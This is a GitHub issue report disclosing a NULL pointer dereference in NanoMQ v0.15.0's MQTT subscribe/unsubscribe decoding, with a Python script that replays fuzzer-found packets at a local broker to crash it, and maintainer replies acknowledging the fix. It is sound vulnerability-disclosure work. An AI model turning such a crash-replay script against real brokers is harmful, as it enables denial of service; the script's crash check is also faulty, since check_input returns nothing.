Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Segment Fault occurs due to NULL Pointer reference in subinfo_decode & unsubinfo_decode while broker is parsing mqtt #1038

Closed
realsung opened this issue Feb 7, 2023 · 3 comments · Fixed by nanomq/NanoNNG#428
Assignees
Labels

Comments

@realsung
Copy link

realsung commented Feb 7, 2023

Describe the bug
segments fault with CWE-476 (NULL Pointer Dereference) occurred in the process of decoding subinfo_decode and unsubinfo_decode

Expected behavior
Dos

Actual Behavior
Describe what occurred.

To Reproduce

import subprocess
import time 
import socket

def check_input(input, sleep_time = 0.01):
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	while True:
		try:
			s.connect(('127.0.0.1', 1883))
			s.send(input)      
			s.close()
			break
		except ConnectionResetError:
			continue
		except ConnectionRefusedError:
			break

	time.sleep(sleep_time)

def check_crash_log(crash_log):
	for c in reversed(crash_log):
		c_bytes = bytearray.fromhex(c)
		status = check_input(c_bytes, 0.25)
		if status == False:
			print('[+] A crash was detected')
			return c_bytes
	print('[-] No crash..')
	exit(-1)

with open('target-1675744763.830481.txt', 'r') as f:
	crash_log = f.readlines()

check_crash_log(crash_log)

target file
target-1675744763.830481.txt

img file
backtrace :
bt

debug :
a1

a2

** Environment Details **

  • NanoMQ version : v0.15.0-0

  • Operating system and version : Linux lab-virtual-machine 5.15.0-58-generic x86_64 x86_64 x86_64 GNU/Linux

  • Compiler and language used : I using Debugging guide(debug NanoMQ with GDB.) Option with ninja compile

  • testing scenario
    Run the broker with the ./nanomq start command, put the target file and the python file in the same path, and run python.

Client SDK
Using MQTT Raw Packet

Additional context
Add any other context about the problem here.

@realsung
Copy link
Author

realsung commented Feb 8, 2023

thks :) have a good day!

@realsung realsung closed this as completed Feb 8, 2023
@JaylinYu
Copy link
Member

JaylinYu commented Feb 8, 2023

Hi bro, we really appreciate your efforts of identifying security issue. We are planning merge dynamic fuzzing with routine development.
Additionally, We also found other issues by using your fuzzing dataset, will fix it soon.

@JaylinYu
Copy link
Member

JaylinYu commented Feb 8, 2023

@realsung plz throw us more issues like this!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
Projects
None yet
Development

Successfully merging a pull request may close this issue.

3 participants